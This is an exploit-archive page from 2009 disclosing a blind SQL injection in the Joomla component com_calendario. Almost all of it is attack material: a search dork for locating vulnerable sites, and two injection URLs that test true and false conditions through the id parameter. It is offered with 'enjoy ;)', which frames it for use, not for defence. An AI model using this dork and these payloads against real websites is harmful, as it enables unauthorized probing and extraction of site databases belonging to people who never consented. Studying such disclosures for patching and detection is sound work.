[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_calendario Blind SQL injection Vulnerability
# Published : 2009-12-28
# Author : Mr.tro0oqy
# Previous Title : Calendar Express 2.0 SQL Injection Vulnerability
# Next Title : Sunbyte e-Flower SQL Injection Vulneralbility


Joomla Component com_calendario Blind SQL injection Vulnerability

author : Mr.tro0oqy --> yemeni hacker

email : t.4@windowslive.com

dork: inurl:index.php?option=com_calendario


exp :

http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true


http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false


enjoy ;)